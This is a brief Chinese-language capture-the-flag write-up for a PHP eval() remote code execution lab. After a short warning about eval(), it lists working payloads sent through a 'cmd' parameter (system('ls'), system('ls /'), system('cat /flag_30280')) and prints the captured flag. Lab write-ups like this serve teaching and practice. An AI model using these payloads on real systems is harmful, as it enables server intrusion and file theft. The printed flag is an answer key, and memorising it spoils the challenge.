eval ()是一个危险的函数,它使用与调用者相同的权限执行代码。 如果你用eval() 运行的字符串代码被恶意方 (不怀好意的人) 修改,您最终可能会在您的网页/扩展程序的权限下,在用户计算机上运行恶意代码。
1、源码查看
将命令赋值给参数cmd,然后执行。
2、查看当前目录文件
poyload:?cmd=system("ls");
发现只有一个index.php,显示不完全,使用""ls /"查看根目录下的所有文件
poyload:?cmd=system("ls /");
3、查看文件内容,获取flag
poyload:?cmd=system("cat /flag_30280");
拿下flag:ctfhub{d7378843fe63620d8e668d1a}